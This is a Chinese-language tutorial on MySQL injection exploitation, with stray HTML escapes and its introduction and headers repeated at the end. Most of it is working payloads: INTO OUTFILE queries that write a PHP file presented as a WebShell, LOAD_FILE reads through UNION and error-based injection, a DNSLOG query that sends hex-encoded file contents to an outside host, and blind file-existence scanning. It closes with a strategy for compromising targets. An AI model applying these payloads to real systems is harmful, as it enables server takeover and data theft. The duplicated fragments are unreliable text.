MySQL注入高级利用：文件读写与WebShell写入技术<\/h1>

0x00 前言<\/h2>
本技术文档详细讲解MySQL注入中利用报错注入读取文件内容、使用`LINES TERMINATED BY<\/code>在查询只返回一个字段时写入WebShell文件，以及如何利用load_file<\/code>函数扫描判断文件是否存在的高级技术。<\/p>`

0x01 INTO OUTFILE 文件写入技术<\/h2>
基本要求<\/h3>

用户必须具有FILE权限<\/li>
文件不能覆盖写入，目标文件必须不存在<\/li>
如果secure_file_priv<\/code>非空，则只能写入该目录下的文件<\/li>
<\/ul>
写入方法对比<\/h3>


FIELDS TERMINATED BY<\/strong><\/p>

原理：在每个字段之间插入WebShell内容<\/li>
限制：当SELECT只返回一个字段时，无法写入WebShell内容<\/li>
示例：
SELECT<\/span> username FROM<\/span> user<\/span> WHERE<\/span> id =<\/span> 1<\/span> INTO<\/span> OUTFILE 'D:\/1.php'<\/span> FIELDS TERMINATED BY<\/span> 0<\/span>x3c3f70687020706870696e666f28293b3f3e
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

LINES TERMINATED BY \/ LINES STARTING BY<\/strong><\/p>

原理：在每条记录的结尾或开始处插入WebShell内容<\/li>
优势：即使只查询一个字段也能写入WebShell，适用于LIMIT等不能UNION的语句<\/li>
示例：
SELECT<\/span> username FROM<\/span> user<\/span> WHERE<\/span> id =<\/span> 1<\/span> INTO<\/span> OUTFILE 'D:\/1.php'<\/span> LINES TERMINATED BY<\/span> 0<\/span>x3c3f70687020706870696e666f28293b3f3e
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
具体写入技术<\/h3>


UNION注入写入<\/strong><\/p>
SELECT<\/span> *<\/span> FROM<\/span> user<\/span> WHERE<\/span> id =<\/span> -<\/span>1<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,2<\/span>,0<\/span>x3c3f70687020706870696e666f28293b3f3e INTO<\/span> OUTFILE 'D:\/1.php'<\/span>
<\/span><\/span><\/code><\/pre><\/li>

FIELDS TERMINATED BY写入<\/strong><\/p>
SELECT<\/span> *<\/span> FROM<\/span> user<\/span> WHERE<\/span> id =<\/span> 1<\/span> INTO<\/span> OUTFILE 'D:\/1.php'<\/span> FIELDS TERMINATED BY<\/span> 0<\/span>x3c3f70687020706870696e666f28293b3f3e
<\/span><\/span><\/code><\/pre><\/li>

LINES TERMINATED BY写入<\/strong><\/p>
SELECT<\/span> username FROM<\/span> user<\/span> WHERE<\/span> id =<\/span> 1<\/span> INTO<\/span> OUTFILE 'D:\/1.php'<\/span> LINES TERMINATED BY<\/span> 0<\/span>x3c3f70687020706870696e666f28293b3f3e
<\/span><\/span><\/code><\/pre><\/li>

LINES STARTING BY写入<\/strong><\/p>
SELECT<\/span> username FROM<\/span> user<\/span> WHERE<\/span> id =<\/span> 1<\/span> INTO<\/span> OUTFILE 'D:\/2.php'<\/span> LINES STARTING BY<\/span> 0<\/span>x3c3f70687020706870696e666f28293b3f3e
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x02 LOAD_FILE 文件读取技术<\/h2>
基本要求<\/h3>

用户必须具有FILE权限<\/li>
如果secure_file_priv<\/code>非空，则只能读取该目录下的文件<\/li>
<\/ul>
读取方法<\/h3>


联合注入+LOAD_FILE<\/strong><\/p>
SELECT<\/span> *<\/span> FROM<\/span> user<\/span> WHERE<\/span> id=-<\/span>1<\/span> UNION<\/span> SELECT<\/span> 1<\/span>,'1'<\/span>,(SELECT<\/span> LOAD_FILE('D:\/1.php'<\/span>))
<\/span><\/span><\/code><\/pre><\/li>

DNSLOG带外查询<\/strong><\/p>

要求：Windows环境<\/li>
<\/ul>
SELECT<\/span> id FROM<\/span> user<\/span> WHERE<\/span> id =<\/span> LOAD_FILE(CONCAT('\\\\'<\/span>,HEX((SELECT<\/span> LOAD_FILE('D:\/1.php'<\/span>))),'.t00ls.xxxxxxxxx.tu4.org\\a.txt'<\/span>))
<\/span><\/span><\/code><\/pre><\/li>

报错注入+LOAD_FILE<\/strong><\/p>

推荐使用HEX编码方式分段读取文件内容<\/li>
<\/ul>
SELECT<\/span> *<\/span> FROM<\/span> user<\/span> WHERE<\/span> username =<\/span> ''<\/span> AND<\/span> UPDATEXML(0<\/span>,CONCAT(0<\/span>x7e,(LOAD_FILE('D:\/1.php'<\/span>)),0<\/span>x7e),0<\/span>)
<\/span><\/span><\/code><\/pre>SELECT<\/span> *<\/span> FROM<\/span> user<\/span> WHERE<\/span> id=<\/span>1<\/span> AND<\/span> (EXTRACTVALUE(1<\/span>,CONCAT(0<\/span>x7e,(SELECT<\/span> (LOAD_FILE('D:\/1.php'<\/span>))),0<\/span>x7e)))
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x03 文件存在性扫描技术<\/h2>
原理<\/h3>

LOAD_FILE<\/code>读取文件时，若无权限或文件不存在则返回NULL<\/li>
结合ISNULL+LOAD_FILE<\/code>可判断文件是否存在<\/li>
<\/ul>
判断方法<\/h3>


文件存在时：ISNULL(LOAD_FILE('文件名'))<\/code>返回0<\/p>
SELECT<\/span> *<\/span> FROM<\/span> user<\/span> WHERE<\/span> username =<\/span> ''<\/span> AND<\/span> UPDATEXML(0<\/span>,CONCAT(0<\/span>x7e,ISNULL<\/span>(LOAD_FILE('D:\/1.php'<\/span>)),0<\/span>x7e),0<\/span>);
<\/span><\/span><\/code><\/pre>报错信息：ERROR 1105 (HY000): XPATH syntax error: '~0~'<\/code><\/p>
<\/li>

文件不存在时：ISNULL(LOAD_FILE('文件名'))<\/code>返回1<\/p>
SELECT<\/span> *<\/span> FROM<\/span> user<\/span> WHERE<\/span> username =<\/span> ''<\/span> AND<\/span> UPDATEXML(0<\/span>,CONCAT(0<\/span>x7e,ISNULL<\/span>(LOAD_FILE('D:\/xxxxx'<\/span>)),0<\/span>x7e),0<\/span>);
<\/span><\/span><\/code><\/pre>报错信息：ERROR 1105 (HY000): XPATH syntax error: '~1~'<\/code><\/p>
<\/li>
<\/ul>
实际应用<\/h3>

可结合Burp爆破扫描文件名<\/li>
示例：扫描C:\/Windows\/win.ini<\/code>存在，而C:\/Windows\/passwd<\/code>不存在<\/li>
<\/ul>
0x04 总结与利用策略<\/h2>


已知绝对路径且有权限时<\/strong><\/p>

直接使用INTO OUTFILE<\/code>写入WebShell<\/li>
<\/ul>
<\/li>

未知网站绝对路径时<\/strong><\/p>

读取常见配置文件获取路径<\/li>
直接读取敏感文件获取信息<\/li>
<\/ul>
<\/li>

盲注情况下<\/strong><\/p>

利用DNSLOG带外获取内容<\/li>
使用HEX()函数转换后按位读取文件内容<\/li>
<\/ul>
<\/li>

其他技巧<\/strong><\/p>

结合报错注入和文件操作进行更深入的信息收集<\/li>
利用文件存在性扫描技术枚举系统文件<\/li>
<\/ul>
<\/li>
<\/ol>
本技术文档涵盖了MySQL注入中文件读写和WebShell写入的核心技术，实际应用中可根据目标环境选择最适合的方法组合使用。<\/p>

MySQL注入高级利用：文件读写与WebShell写入技术<\/h1>

0x00 前言<\/h2> 本技术文档详细讲解MySQL注入中利用报错注入读取文件内容、使用LINES TERMINATED BY<\/code>在查询只返回一个字段时写入WebShell文件，以及如何利用load_file<\/code>函数扫描判断文件是否存在的高级技术。<\/p>

0x02 LOAD_FILE 文件读取技术<\/h2>

0x03 文件存在性扫描技术<\/h2>

0x00 前言<\/h2>
本技术文档详细讲解MySQL注入中利用报错注入读取文件内容、使用`LINES TERMINATED BY<\/code>在查询只返回一个字段时写入WebShell文件，以及如何利用load_file<\/code>函数扫描判断文件是否存在的高级技术。<\/p>`